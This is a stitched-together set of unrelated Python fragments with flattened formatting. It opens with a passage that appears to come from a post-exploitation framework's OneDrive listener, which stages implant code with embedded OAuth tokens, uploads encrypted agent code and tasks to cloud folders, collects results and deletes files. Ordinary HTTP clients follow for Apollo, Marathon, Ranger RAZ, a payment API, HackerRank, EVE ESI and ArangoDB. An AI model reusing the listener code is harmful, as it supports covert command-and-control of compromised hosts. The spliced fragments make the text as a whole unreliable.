item['@microsoft.graph.downloadUrl']).content lang, return_val = \ self.mainMenu.agents.handle_agent_data(staging_key, content, listener_options)[0] message = "[*] Uploading {}/{}/{}_2.txt, {} bytes".format( base_folder, staging_folder, agent_name, str(len(return_val))) signal = json.dumps({ 'print': False, 'message': message }) dispatcher.send( signal, sender="listeners/onedrive/{}".format( listener_name)) s.put("%s/drive/root:/%s/%s/%s_2.txt:/content" % (base_url, base_folder, staging_folder, agent_name), data=return_val) message = "[*] Deleting {}/{}/{}".format( base_folder, staging_folder, item['name']) signal = json.dumps({ 'print': False, 'message': message }) dispatcher.send( signal, sender="listeners/onedrive/{}".format( listener_name)) s.delete("%s/drive/items/%s" % (base_url, item['id'])) if stage == '3': # Download stage 3, upload stage 4 (full agent code) message = "[*] Downloading {}/{}/{}, {} bytes".format( base_folder, staging_folder, item['name'], item['size']) signal = json.dumps({ 'print': False, 'message': message }) dispatcher.send( signal, sender="listeners/onedrive/{}".format( listener_name)) content = s.get( item['@microsoft.graph.downloadUrl']).content lang, return_val = \ self.mainMenu.agents.handle_agent_data(staging_key, content, listener_options)[0] session_key = self.mainMenu.agents.agents[ agent_name]['sessionKey'] agent_token = renew_token( client_id, client_secret, token['refresh_token'] ) # Get auth and refresh tokens for the agent to use agent_code = str( self.generate_agent( listener_options, client_id, client_secret, agent_token['access_token'], agent_token['refresh_token'], redirect_uri, lang)) enc_code = encryption.aes_encrypt_then_hmac( session_key, agent_code) message = "[*] Uploading {}/{}/{}_4.txt, {} bytes".format( base_folder, staging_folder, agent_name, str(len(enc_code))) signal = json.dumps({ 'print': False, 'message': message }) dispatcher.send( signal, sender="listeners/onedrive/{}".format( listener_name)) s.put("%s/drive/root:/%s/%s/%s_4.txt:/content" % (base_url, base_folder, staging_folder, agent_name), data=enc_code) message = "[*] Deleting {}/{}/{}".format( base_folder, staging_folder, item['name']) signal = json.dumps({ 'print': False, 'message': message }) dispatcher.send( signal, sender="listeners/onedrive/{}".format( listener_name)) s.delete("%s/drive/items/%s" % (base_url, item['id'])) except Exception as e: print( helpers.color( "[!] Could not handle agent staging for listener %s, continuing" % listener_name)) message = traceback.format_exc() signal = json.dumps({ 'print': False, 'message': message }) dispatcher.send(signal, sender="listeners/onedrive/{}".format( listener_name)) agent_ids = self.mainMenu.agents.get_agents_for_listener( listener_name) for agent_id in agent_ids: # Upload any tasks for the current agents if isinstance(agent_id, bytes): agent_id = agent_id.decode('UTF-8') task_data = self.mainMenu.agents.handle_agent_request( agent_id, 'powershell', staging_key, update_lastseen=True) if task_data: try: r = s.get("%s/drive/root:/%s/%s/%s.txt:/content" % (base_url, base_folder, taskings_folder, agent_id)) if r.status_code == 200: # If there's already something there, download and append the new data task_data = r.content + task_data message = "[*] Uploading agent tasks for {}, {} bytes".format( agent_id, str(len(task_data))) signal = json.dumps({ 'print': False, 'message': message }) dispatcher.send( signal, sender="listeners/onedrive/{}".format( listener_name)) r = s.put("%s/drive/root:/%s/%s/%s.txt:/content" % (base_url, base_folder, taskings_folder, agent_id), data=task_data) except Exception as e: message = "[!] Error uploading agent tasks for {}, {}".format( agent_id, e) signal = json.dumps({ 'print': False, 'message': message }) dispatcher.send( signal, sender="listeners/onedrive/{}".format( listener_name)) search = s.get("%s/drive/root:/%s/%s?expand=children" % (base_url, base_folder, results_folder)) for item in search.json( )['children']: # For each file in the results folder try: agent_id = item['name'].split(".")[0] for i in range(len(agent_ids)): agent_ids[i] = agent_ids[i].decode('UTF-8') if not agent_id in agent_ids: # If we don't recognize that agent, upload a message to restage print( helpers.color( "[*] Invalid agent, deleting %s/%s and restaging" % (results_folder, item['name']))) s.put("%s/drive/root:/%s/%s/%s.txt:/content" % (base_url, base_folder, taskings_folder, agent_id), data="RESTAGE") s.delete("%s/drive/items/%s" % (base_url, item['id'])) continue try: # Update the agent's last seen time, from the file timestamp seen_time = datetime.strptime( item['lastModifiedDateTime'], "%Y-%m-%dT%H:%M:%S.%fZ") except: # sometimes no ms for some reason... seen_time = datetime.strptime( item['lastModifiedDateTime'], "%Y-%m-%dT%H:%M:%SZ") seen_time = helpers.utc_to_local(seen_time) self.mainMenu.agents.update_agent_lastseen_db( agent_id, seen_time) # If the agent is just checking in, the file will only be 1 byte, so no results to fetch if (item['size'] > 1): message = "[*] Downloading results from {}/{}, {} bytes".format( results_folder, item['name'], item['size']) signal = json.dumps({ 'print': False, 'message': message }) dispatcher.send( signal, sender="listeners/onedrive/{}".format( listener_name)) r = s.get(item['@microsoft.graph.downloadUrl']) self.mainMenu.agents.handle_agent_data( staging_key, r.content, listener_options, update_lastseen=True) message = "[*] Deleting {}/{}".format( results_folder, item['name']) signal = json.dumps({ 'print': False, 'message': message }) dispatcher.send( signal, sender="listeners/onedrive/{}".format( listener_name)) s.delete("%s/drive/items/%s" % (base_url, item['id'])) except Exception as e: message = "[!] Error handling agent results for {}, {}".format( item['name'], e) signal = json.dumps({ 'print': False, 'message': message }) dispatcher.send(signal, sender="listeners/onedrive/{}".format( listener_name)) except Exception as e: print( helpers.color( "[!] Something happened in listener %s: %s, continuing" % (listener_name, e))) message = traceback.format_exc() signal = json.dumps({'print': False, 'message': message}) dispatcher.send( signal, sender="listeners/onedrive/{}".format(listener_name)) s.close()
class ApolloMonitor(object): """Class for monitoring an Apache Apollo server""" def __init__(self, host, virtual_host, port=61680, realm='Apollo', username='******', password='******', update_interval_s=5): """Construct a new ApolloMonitor that monitors the $virtual_host virtual-host on the Apollo server at $host:$port with credentials $username and $password. Monitor for update events every $update_interval_s seconds (or, if seconds is None, not at all).""" # Prepare a URL opener self.auth = (username, password) self._url = ('http://%s:%d/broker/virtual-hosts/%s' % (host, port, virtual_host)) self._url_queues = self._url + '/queues.json' self._url_delete = self._url + '/queues/%s.json' self._s = Session() # Initialize the queue status dictionary self.queues = self._structure_queue_data(self._get_queue_data()) for queue in self.queues.values(): self.on_queue_init(queue) # Initialize the update wait event self.update_event = Event() self.update_event.clear() # Run updates in a loop if update_interval_s is not None: call_periodic(update_interval_s, self.do_update) def _get_queue_data(self): """Return a parsed structure containing the current queue data""" # Repeat until a full download is accomplished page_size = -1 total_rows = 0 while page_size < total_rows: # Determine the new page size page_size = total_rows + 1000 url = self._url_queues + ('?ps=%d' % page_size) # Get the JSON-formatted data queues = self._s.get(url, auth=self.auth).json if callable(queues): queues = queues() # Extract the new page size and row counts page_size = queues['page_size'] total_rows = queues['total_rows'] # Operation Complete! return queues['rows'] def _structure_queue_data(self, queues, exclude_temp=True): """Construct a dictionary mapping destination names to a queue data structure, optionally excluding temporary destinations.""" return dict((q['id'], q) for q in queues if not exclude_temp or not q['id'].startswith('temp.')) def _detect_queue_changes(self, new_queues): """Fire events for handling new, updated, and deleted queues""" # We will send a blank logging message if there is at least one event any_events = False # Keep a list of the old queues old_queues = set(self.queues.keys()) # Iterate over new_queues for q_id in new_queues: queue = new_queues[q_id] # Detect a modified queue if q_id in old_queues: # Report the update self.on_queue_update(self.queues[q_id], queue) old_queues.remove(q_id) any_events |= True else: # Report the new queue self.on_queue_new(queue) any_events |= True self.queues[q_id] = queue # Delete old queues for q_id in old_queues: # Report the removal self.on_queue_delete(self.queues[q_id]) self.queues.pop(q_id) any_events |= True # Send a blank logging message if there were any events # (This causes logging output to appear in stanzas) if any_events: logger.debug('') def do_update(self): """Download new queue data and send update notifications""" new_queues = self._structure_queue_data(self._get_queue_data()) self._detect_queue_changes(new_queues) # Report update event to blockers self.update_event.set() self.update_event.clear() def on_queue_init(self, queue): """MAY override: called after the ApolloMonitor is initializing and loading in the initial queue status""" logger.debug('on_queue_init( "%s" )' % queue['id']) # logger.debug('on_queue_init( %s )' % repr(queue)) def on_queue_new(self, queue): """MAY override: called before a new queue is added to the status dictionary""" logger.debug('on_queue_new( "%s" )' % queue['id']) # logger.debug('on_queue_new( %s )' % repr(queue)) def on_queue_update(self, old_queue, new_queue): """MAY override: called before a queue is updated in the status dictionary. Overrides MUST call the super of this event handler so that on_queue_empty events may be fired.""" logger.debug('on_queue_update( "%s", ... ): %d items' % (old_queue['id'], old_queue['metrics']['queue_items'])) # logger.debug('on_queue_update( %s, %s )' # % (repr(old_queue), repr(new_queue))) # if the queue is now empty, and something has been dequeued since # the last queue update, then it qualifies as "this is now empty" if ((new_queue['metrics']['queue_items'] == 0) and (old_queue['metrics']['dequeue_item_counter'] != new_queue['metrics']['dequeue_item_counter'] )): self.on_queue_empty(new_queue) def on_queue_empty(self, queue): """MAY override: called before a queue is update in the status dictionary when the queue is newly empty.""" logger.debug('on_queue_empty( "%s" )' % queue['id']) # logger.debug('on_queue_empty( %s )' % repr(queue)) def on_queue_delete(self, old_queue): """MAY override: called before a queue is deleted from the status dictionary""" logger.debug('on_queue_delete( "%s" )' % old_queue['id']) # logger.debug('on_queue_delete( %s )' % repr(old_queue)) def delete_queue(self, queue): """ Delete a given queue. Returns the status code of the request (likely either 204 on success or 404 if the queue doesn't exist). """ # Quote properly, or will this suffice? queue = queue.replace('%', '%25') self._s.delete(self._url_delete % queue, auth=self.auth) def delete(self, destination): """ Delete a given destination (queue, topic, or dsub). """ # mostly copied from delete_queue destination = destination.replace('%', '%25') empty, thing, dest = destination.split('/') self._s.delete(self._url + ('/%ss/%s.json' % (thing, dest)), auth=self.auth) def wait_for_update(self, n=1): """ Wait for n updates to be fetched and sent through event handlers """ for it in xrange(n): self.update_event.wait()
def teardown_marathon_tf_session(marathon_url_str, marathon_usr, marathon_usrpwd, tsknom_str, tsk_idx): s = Session() marathon_url_str = marathon_url_str.replace("marathon://", "http://") resp = s.delete(url='%s/v2/apps/%s%d' % (marathon_url_str, tsknom_str, tsk_idx), auth=HTTPBasicAuth(marathon_usr, marathon_usrpwd))
class RangerRazClient: def __init__(self, url, auth): self.url = url self.session = Session() self.session.auth = auth logging.getLogger("requests").setLevel(logging.WARNING) def get_delegation_token(self, renewer, dtServiceName=None, doAsUser=None): resp = None if self.__is_kerberos_authenticated(): resp = self.__call_api( RangerRazClient.GET_DELEGATION_TOKEN, self.__get_query_params( { RangerRazClient.PARAM_OP: RangerRazClient.GET_DELEGATION_TOKEN, RangerRazClient.PARAM_RENEWER: renewer, RangerRazClient.PARAM_DT_SERVICENAME: dtServiceName }, doAsUser)) else: LOG.error( "Kerberos Authentication is required to get RAZ delegation token" ) return resp def renew_delegation_token(self, delegation_token, doAsUser=None): resp = None if self.__is_kerberos_authenticated(): resp = self.__call_api( RangerRazClient.RENEW_DELEGATION_TOKEN, self.__get_query_params( { RangerRazClient.PARAM_OP: RangerRazClient.RENEW_DELEGATION_TOKEN, RangerRazClient.PARAM_TOKEN: delegation_token }, doAsUser)) else: LOG.error( "Kerberos Authentication is required to renew RAZ delegation token" ) return resp def cancel_delegation_token(self, delegation_token, doAsUser=None): resp = None if self.__is_kerberos_authenticated(): resp = self.__call_api( RangerRazClient.CANCEL_DELEGATION_TOKEN, self.__get_query_params( { RangerRazClient.PARAM_OP: RangerRazClient.CANCEL_DELEGATION_TOKEN, RangerRazClient.PARAM_TOKEN: delegation_token }, doAsUser)) else: LOG.error( "Kerberos Authentication is required to cancel RAZ delegation token" ) return resp def check_privilege(self, raz_request, doAsUser=None): resp = self.__call_api(RangerRazClient.CHECK_PRIVILEGE.format_path( {'serviceType': raz_request.serviceType}), query_params=self.__get_query_params( None, doAsUser), request_data=raz_request) return type_coerce(resp, RangerRazResult) def check_privileges(self, raz_requests, doAsUser=None): resp = self.__call_api(RangerRazClient.CHECK_PRIVILEGES.format_path( {'serviceType': raz_request.serviceType}), query_params=self.__get_query_params( None, doAsUser), request_data=raz_requests) return type_coerce_list(resp, RangerRazResult) def __is_kerberos_authenticated(self): from requests_kerberos import HTTPKerberosAuth return isinstance(self.session.auth, HTTPKerberosAuth) def __get_query_params(self, query_params, doAsUser=None): if doAsUser is not None: query_params = query_params or {} query_params[RangerRazClient.PARAM_DOAS] = doAsUser return query_params def __call_api(self, api, query_params=None, request_data=None): ret = None params = { 'headers': { 'Accept': api.consumes, 'Content-type': api.produces } } if query_params: params['params'] = query_params if request_data: params['data'] = json.dumps(request_data) path = os.path.join(self.url, api.path) if LOG.isEnabledFor(logging.DEBUG): LOG.debug("------------------------------------------------------") LOG.debug("Call : %s %s", api.method, path) LOG.debug("Content-type : %s", api.consumes) LOG.debug("Accept : %s", api.produces) response = None if api.method == HttpMethod.GET: response = self.session.get(path, **params) elif api.method == HttpMethod.POST: response = self.session.post(path, **params) elif api.method == HttpMethod.PUT: response = self.session.put(path, **params) elif api.method == HttpMethod.DELETE: response = self.session.delete(path, **params) if LOG.isEnabledFor(logging.DEBUG): LOG.debug("HTTP Status: %s", response.status_code if response else "None") if response is None: ret = None elif response.status_code == api.expected_status: try: if response.content is not None: if LOG.isEnabledFor(logging.DEBUG): LOG.debug("<== __call_api(%s, %s, %s), result=%s", vars(api), params, request_data, response) LOG.debug(response.json()) ret = response.json() else: ret = None except Exception as e: print(e) LOG.exception( "Exception occurred while parsing response with msg: %s", e) raise RangerRazException(api, response) elif response.status_code == HTTPStatus.SERVICE_UNAVAILABLE: LOG.error("Ranger Raz server unavailable. HTTP Status: %s", HTTPStatus.SERVICE_UNAVAILABLE) ret = None else: raise RangerRazException(api, response) return ret # URIs PARAM_OP = "op" PARAM_RENEWER = "renewer" PARAM_TOKEN = "token" PARAM_DELEGATION = "delegation" PARAM_DOAS = "doAs" PARAM_DT_SERVICENAME = "service" OP_GETDELEGATIONTOKEN = "GETDELEGATIONTOKEN" OP_RENEWDELEGATIONTOKEN = "RENEWDELEGATIONTOKEN" OP_CANCELDELEGATIONTOKEN = "CANCELDELEGATIONTOKEN" URI_DELEGATION_TOKEN = "" URI_CHECK_PRIVILEGE = "api/authz/{serviceType}/access" URI_CHECK_PRIVILEGES = "api/authz/{serviceType}/accesses" # APIs GET_DELEGATION_TOKEN = API(URI_DELEGATION_TOKEN, HttpMethod.GET, HTTPStatus.OK) RENEW_DELEGATION_TOKEN = API(URI_DELEGATION_TOKEN, HttpMethod.PUT, HTTPStatus.OK) CANCEL_DELEGATION_TOKEN = API(URI_DELEGATION_TOKEN, HttpMethod.PUT, HTTPStatus.OK) CHECK_PRIVILEGE = API(URI_CHECK_PRIVILEGE, HttpMethod.POST, HTTPStatus.OK) CHECK_PRIVILEGES = API(URI_CHECK_PRIVILEGES, HttpMethod.POST, HTTPStatus.OK)
class HTTPClient(object): def __init__(self, base_url, auth_params, headers=None): """Initialize a new opp connection. Requires user name and password.""" logger.debug( "START: OPP API connection with BASE_URL: {0}".format(base_url)) self.base_url = base_url self.session = Session() self.session.verify = opp.config.config.ssl_verify self.auth_params = auth_params self.headers = headers self.operations = dict(GET=self.get, POST=self.post, PUT=self.put, DELETE=self.delete) # for internal usage self.response = None def __call__(self, request_type, params, url, return_type): """ :param request_type: :param params: :param url: :param return_type: :return: :raise ValueError: """ if request_type == 'POST': params.update({"customParameters[SHOPPER_pluginId]": "Python"}) if opp.config.config.mode == opp.config.TEST_INTERNAL: params.update({"testMode": "INTERNAL"}) if opp.config.config.mode == opp.config.TEST_EXTERNAL: params.update({"testMode": "EXTERNAL"}) if self.auth_params: params.update(self.auth_params) try: result = self.operations[request_type](params, url, return_type, headers=self.headers) logger.debug("SUCCESS: {0} {1}".format(request_type, url)) return result except ValueError as v: # JSON encoding failed logger.debug("ERROR: {0} {1}".format(request_type, url)) if self.response is not None: raise ValueError(self.response.content, self.response.status_code) else: raise ValueError() def put(self, params, url, return_type, headers=None): """ :param params: :param url: :param return_type: :return: """ return self._check_response( self.session.put(self.base_url + url, params, timeout=opp.config.config.request_timeout, hooks=dict(response=self._request_callback), headers=headers).json(), return_type) def post(self, params, url, return_type, headers=None): """ :param params: :param url: :param return_type: :return: """ json = self.session.post(self.base_url + url, params, timeout=opp.config.config.request_timeout, hooks=dict(response=self._request_callback), headers=headers).json() return self._check_response(json, return_type) def delete(self, params, url, return_type, headers=None): """ :param params: :param url: :param return_type: :return: """ return self._check_response( self.session.delete(self.base_url + url, params=params, timeout=opp.config.config.request_timeout, hooks=dict(response=self._request_callback), headers=headers).json(), return_type) def get(self, params, url, return_type, headers=None): """ :param params: :param url: :param return_type: :return: """ return self._check_response( self.session.get(self.base_url + url, params=params, timeout=opp.config.config.request_timeout, hooks=dict(response=self._request_callback), headers=headers).json(), return_type) def _request_callback(self, r, *args, **kwargs): """ :param r: :param args: :param kwargs: """ self.response = r def _check_response(self, json_data, return_type): """ :param json_data: :param return_type: :return: :raise ValueError: """ if json_data: # success if isinstance(json_data, dict): return dict(json_data) elif isinstance(json_data, list): return list(json_data) else: return str(json_data) else: # error raise ValueError(json_data, self.response.status_code)
class HRClient(): def __init__(self, username, password): self.session = Session() self.session.hooks['response'].append(addArgsToHook(logAndValidate, getCsrf, session = self.session)) self.login(username, password) def __enter__(self): return self def __exit__(self, *args): self.logout() # added dummy timeout argument to not skip CSRF passing def login(self, username, password): self.session.get(HR + '/dashboard', timeout = 120) data = { 'login': username, 'password': password, 'remember_me': False, } self.session.post(HR + '/auth/login', json = data, timeout = 120) # added dummy timeout argument to not skip CSRF passing def logout(self): return self.session.delete(HR + '/auth/logout', timeout = 120) # added dummy timeout argument to not skip CSRF passing def getUserModel(self): url = HR_REST + CONTESTS + '/master/hackers/me' json = {"updated_modal_profiled_data": {"updated": True}} hooks = {'response': addArgsToHook(logAndValidate, getCsrf, session = self.session)} return self.session.put(url, json = json, hooks = hooks).json()['model'] # TODO add validation and sanity checks on model counts def getNewModels(self, models): if not models: models = {} contests = {} url = HR_REST + '/hackers/me/myrank_contests' contestSlugs = {'master'} | {c['slug'] for c in self.getModels(url, type = 'recent')} for slug in contestSlugs: url = HR_REST + CONTESTS + '/' + slug # get submission info, not models submissionIds = {s['id'] for s in self.getModels(url + SUBMISSIONS)} if slug in models and 'submissions' in models[slug]: submissionIds -= models[slug]['submissions'].keys() # break out early if contest is already represented # TODO break each of these separate processes into separate functions and do sequentially if not submissionIds: continue # TODO is this necessary? does every challenge have an id? # get challenge info, not models challengeIds = {c['id'] for c in self.getModels(url + CHALLENGES)} if slug in models and 'challenges' in models[slug]: challengeIds -= models[slug]['challenges'].keys() # uncomment if only want challenge data for challenges attempted or with accompanying submissions #challengeSlugs = {sub['challenge_slug'] for sub in submissions.values()} #challengeIds = {sub['challenge_id'] for sub in submissions.values()} # begin creation of contest contest = {} contest['model'] = self.session.get(url).json()['model'] contest['submissions'] = self.getModelsKeyed(url + SUBMISSIONS, submissionIds) contest['challenges'] = self.getModelsKeyed(url + CHALLENGES, challengeIds) contests[slug] = contest return contests def getModelsKeyed(self, url, ids): models = {} total = len(ids) for curr, i in enumerate(ids): model = self.session.get(url + '/' + str(i), data = {'remaining': total - curr - 1}).json()['model'] if not model: continue models[i] = model return models # get all models from particular GET request # NOTE must make two calls because order is sometimes not preserved between requests def getModels(self, url, **params): r = self.session.get(url, params = params).json() count = len(r['models']) total = r['total'] # return models if all have been acquired if count >= total: return r['models'] params['limit'] = total return self.session.get(url, params = params).json()['models']
class EsiAccess(object): def __init__(self): self.settings = EsiSettings.getInstance() # session request stuff self._session = Session() self._session.headers.update({ 'Accept': 'application/json', 'User-Agent': ( 'pyfa v{}'.format(config.version) ) }) self._session.proxies = NetworkSettings.getInstance().getProxySettingsInRequestsFormat() @property def sso_url(self): if self.settings.get("ssoMode") == SsoMode.CUSTOM: return "https://login.eveonline.com" return "https://www.pyfa.io" @property def esi_url(self): return "https://esi.tech.ccp.is" @property def oauth_verify(self): return '%s/verify/' % self.esi_url @property def oauth_authorize(self): return '%s/oauth/authorize' % self.sso_url @property def oauth_token(self): return '%s/oauth/token' % self.sso_url def getSkills(self, char): return self.get(char, ESIEndpoints.CHAR_SKILLS, character_id=char.characterID) def getSecStatus(self, char): return self.get(char, ESIEndpoints.CHAR, character_id=char.characterID) def getFittings(self, char): return self.get(char, ESIEndpoints.CHAR_FITTINGS, character_id=char.characterID) def postFitting(self, char, json_str): # @todo: new fitting ID can be recovered from resp.data, return self.post(char, ESIEndpoints.CHAR_FITTINGS, json_str, character_id=char.characterID) def delFitting(self, char, fittingID): return self.delete(char, ESIEndpoints.CHAR_DEL_FIT, character_id=char.characterID, fitting_id=fittingID) @staticmethod def update_token(char, tokenResponse): """ helper function to update token data from SSO response """ char.accessToken = tokenResponse['access_token'] char.accessTokenExpires = datetime.datetime.fromtimestamp(time.time() + tokenResponse['expires_in']) if 'refresh_token' in tokenResponse: char.refreshToken = config.cipher.encrypt(tokenResponse['refresh_token'].encode()) def getLoginURI(self, redirect=None): self.state = str(uuid.uuid4()) if self.settings.get("ssoMode") == SsoMode.AUTO: args = { 'state': self.state, 'pyfa_version': config.version, 'login_method': self.settings.get('loginMode'), 'client_hash': config.getClientSecret() } if redirect is not None: args['redirect'] = redirect return '%s?%s' % ( self.oauth_authorize, urlencode(args) ) else: return '%s?response_type=%s&redirect_uri=%s&client_id=%s%s%s' % ( self.oauth_authorize, 'code', quote('http://localhost:6461', safe=''), self.settings.get('clientID'), '&scope=%s' % '+'.join(scopes) if scopes else '', '&state=%s' % self.state ) def get_oauth_header(self, token): """ Return the Bearer Authorization header required in oauth calls :return: a dict with the authorization header """ return {'Authorization': 'Bearer %s' % token} def get_refresh_token_params(self, refreshToken): """ Return the param object for the post() call to get the access_token from the refresh_token :param code: the refresh token :return: a dict with the url, params and header """ if refreshToken is None: raise AttributeError('No refresh token is defined.') data = { 'grant_type': 'refresh_token', 'refresh_token': refreshToken, } if self.settings.get('ssoMode') == SsoMode.AUTO: # data is all we really need, the rest is handled automatically by pyfa.io return { 'data': data, 'url': self.oauth_token, } # otherwise, we need to make the token with the client keys return self.__make_token_request_parameters(data) def __get_token_auth_header(self): """ Return the Basic Authorization header required to get the tokens :return: a dict with the headers """ # encode/decode for py2/py3 compatibility auth_b64 = "%s:%s" % (self.settings.get('clientID'), self.settings.get('clientSecret')) auth_b64 = base64.b64encode(auth_b64.encode('latin-1')) auth_b64 = auth_b64.decode('latin-1') return {'Authorization': 'Basic %s' % auth_b64} def __make_token_request_parameters(self, params): request_params = { 'headers': self.__get_token_auth_header(), 'data': params, 'url': self.oauth_token, } return request_params def get_access_token_request_params(self, code): return self.__make_token_request_parameters( { 'grant_type': 'authorization_code', 'code': code, } ) def auth(self, code): request_data = self.get_access_token_request_params(code) res = self._session.post(**request_data) if res.status_code != 200: raise Exception( request_data['url'], res.status_code, res.json() ) json_res = res.json() return json_res def refresh(self, ssoChar): request_data = self.get_refresh_token_params(config.cipher.decrypt(ssoChar.refreshToken).decode()) res = self._session.post(**request_data) if res.status_code != 200: raise APIException( request_data['url'], res.status_code, res.json() ) json_res = res.json() self.update_token(ssoChar, json_res) return json_res def _before_request(self, ssoChar): if ssoChar.is_token_expired(): pyfalog.info("Refreshing token for {}".format(ssoChar.characterName)) self.refresh(ssoChar) if ssoChar.accessToken is not None: self._session.headers.update(self.get_oauth_header(ssoChar.accessToken)) def _after_request(self, resp): if "warning" in resp.headers: pyfalog.warn("{} - {}".format(resp.headers["warning"], resp.url)) if resp.status_code >= 400: raise APIException( resp.url, resp.status_code, resp.json() ) return resp def get(self, ssoChar, endpoint, *args, **kwargs): self._before_request(ssoChar) endpoint = endpoint.format(**kwargs) return self._after_request(self._session.get("{}{}".format(self.esi_url, endpoint))) def post(self, ssoChar, endpoint, json, *args, **kwargs): self._before_request(ssoChar) endpoint = endpoint.format(**kwargs) return self._after_request(self._session.post("{}{}".format(self.esi_url, endpoint), data=json)) def delete(self, ssoChar, endpoint, *args, **kwargs): self._before_request(ssoChar) endpoint = endpoint.format(**kwargs) return self._after_request(self._session.delete("{}{}".format(self.esi_url, endpoint)))
class DefaultClient(BaseClient): """Session based HTTP (default) client for ArangoDB.""" def __init__(self, init_data): """Initialize the session with the credentials. :param init_data: data for client initialization :type init_data: dict """ self.session = Session() self.session.auth = init_data["auth"] def head(self, url, params=None, headers=None, auth=None): """HTTP HEAD method. :param url: request URL :type url: str :param params: request parameters :type params: dict or None :param headers: request headers :type headers: dict or None :param auth: username and password tuple :type auth: tuple or None :returns: ArangoDB http response object :rtype: arango.response.Response """ res = self.session.head( url=url, params=params, headers=headers, ) return Response( method="head", url=url, headers=res.headers, status_code=res.status_code, content=res.text, status_text=res.reason ) def get(self, url, params=None, headers=None, auth=None): """HTTP GET method. :param url: request URL :type url: str :param params: request parameters :type params: dict or None :param headers: request headers :type headers: dict or None :param auth: username and password tuple :type auth: tuple or None :returns: ArangoDB http response object :rtype: arango.response.Response """ res = self.session.get( url=url, params=params, headers=headers, ) return Response( method="get", url=url, headers=res.headers, status_code=res.status_code, content=res.text, status_text=res.reason ) def put(self, url, data=None, params=None, headers=None, auth=None): """HTTP PUT method. :param url: request URL :type url: str :param data: request payload :type data: str or dict or None :param params: request parameters :type params: dict or None :param headers: request headers :type headers: dict or None :param auth: username and password tuple :type auth: tuple or None :returns: ArangoDB http response object :rtype: arango.response.Response """ res = self.session.put( url=url, data=data, params=params, headers=headers, ) return Response( method="put", url=url, headers=res.headers, status_code=res.status_code, content=res.text, status_text=res.reason ) def post(self, url, data=None, params=None, headers=None, auth=None): """HTTP POST method. :param url: request URL :type url: str :param data: request payload :type data: str or dict or None :param params: request parameters :type params: dict or None :param headers: request headers :type headers: dict or None :param auth: username and password tuple :type auth: tuple or None :returns: ArangoDB http response object :rtype: arango.response.Response """ res = self.session.post( url=url, data="" if data is None else data, params={} if params is None else params, headers={} if headers is None else headers, ) return Response( method="post", url=url, headers=res.headers, status_code=res.status_code, content=res.text, status_text=res.reason ) def patch(self, url, data=None, params=None, headers=None, auth=None): """HTTP PATCH method. :param url: request URL :type url: str :param data: request payload :type data: str or dict or None :param params: request parameters :type params: dict or None :param headers: request headers :type headers: dict or None :param auth: username and password tuple :type auth: tuple or None :returns: ArangoDB http response object :rtype: arango.response.Response """ res = self.session.patch( url=url, data=data, params=params, headers=headers, ) return Response( method="patch", url=url, headers=res.headers, status_code=res.status_code, content=res.text, status_text=res.reason ) def delete(self, url, params=None, headers=None, auth=None): """HTTP DELETE method. :param url: request URL :type url: str :param params: request parameters :type params: dict or None :param headers: request headers :type headers: dict or None :param auth: username and password tuple :type auth: tuple or None :returns: ArangoDB http response object :rtype: arango.response.Response """ res = self.session.delete( url=url, params=params, headers=headers, auth=auth, ) return Response( method="delete", url=url, headers=res.headers, status_code=res.status_code, content=res.text, status_text=res.reason ) def options(self, url, data=None, params=None, headers=None, auth=None): """HTTP OPTIONS method. :param url: request URL :type url: str :param data: request payload :type data: str or dict or None :param params: request parameters :type params: dict or None :param headers: request headers :type headers: dict or None :param auth: username and password tuple :type auth: tuple or None :returns: ArangoDB http response object :rtype: arango.response.Response """ res = self.session.options( url=url, data="" if data is None else data, params={} if params is None else params, headers={} if headers is None else headers, ) return Response( method="options", url=url, headers=res.headers, status_code=res.status_code, content=res.text, status_text=res.reason ) def close(self): """Close the HTTP session.""" self.session.close()
class HTTPClient(object): def __init__(self, base_url, auth_params): """Initialize a new opp connection. Requires user name and password.""" logger.debug("START: OPP API connection with BASE_URL: {0}".format(base_url)) self.base_url = base_url self.session = Session() self.session.verify = opp.config.config.ssl_verify self.auth_params = auth_params self.operations = dict(GET=self.get, POST=self.post, PUT=self.put, DELETE=self.delete) # for internal usage self.response = None def __call__(self, request_type, params, url, return_type): """ :param request_type: :param params: :param url: :param return_type: :return: :raise ValueError: """ if request_type == 'POST': params.update({"customParameters[SHOPPER_pluginId]": "Python"}) if opp.config.config.mode == opp.config.TEST_INTERNAL: params.update({"testMode": "INTERNAL"}) if opp.config.config.mode == opp.config.TEST_EXTERNAL: params.update({"testMode": "EXTERNAL"}) if self.auth_params: params.update(self.auth_params) try: result = self.operations[request_type](params, url, return_type) logger.debug("SUCCESS: {0} {1}".format(request_type, url)) return result except ValueError as v: # JSON encoding failed logger.debug("ERROR: {0} {1}".format(request_type, url)) if self.response is not None: raise ValueError(self.response.content, self.response.status_code) else: raise ValueError() def put(self, params, url, return_type): """ :param params: :param url: :param return_type: :return: """ return self._check_response(self.session.put(self.base_url + url, params, timeout=opp.config.config.request_timeout, hooks=dict(response=self._request_callback), ).json(), return_type) def post(self, params, url, return_type): """ :param params: :param url: :param return_type: :return: """ json = self.session.post(self.base_url + url, params, timeout=opp.config.config.request_timeout, hooks=dict(response=self._request_callback)).json() return self._check_response(json, return_type) def delete(self, params, url, return_type): """ :param params: :param url: :param return_type: :return: """ return self._check_response(self.session.delete(self.base_url + url, params=params, timeout=opp.config.config.request_timeout, hooks=dict(response=self._request_callback)).json(), return_type) def get(self, params, url, return_type): """ :param params: :param url: :param return_type: :return: """ return self._check_response(self.session.get(self.base_url + url, params=params, timeout=opp.config.config.request_timeout, hooks=dict(response=self._request_callback)).json(), return_type) def _request_callback(self, r, *args, **kwargs): """ :param r: :param args: :param kwargs: """ self.response = r def _check_response(self, json_data, return_type): """ :param json_data: :param return_type: :return: :raise ValueError: """ if json_data: # success if isinstance(json_data, dict): return dict(json_data) elif isinstance(json_data, list): return list(json_data) else: return str(json_data) else: # error raise ValueError(json_data, self.response.status_code)
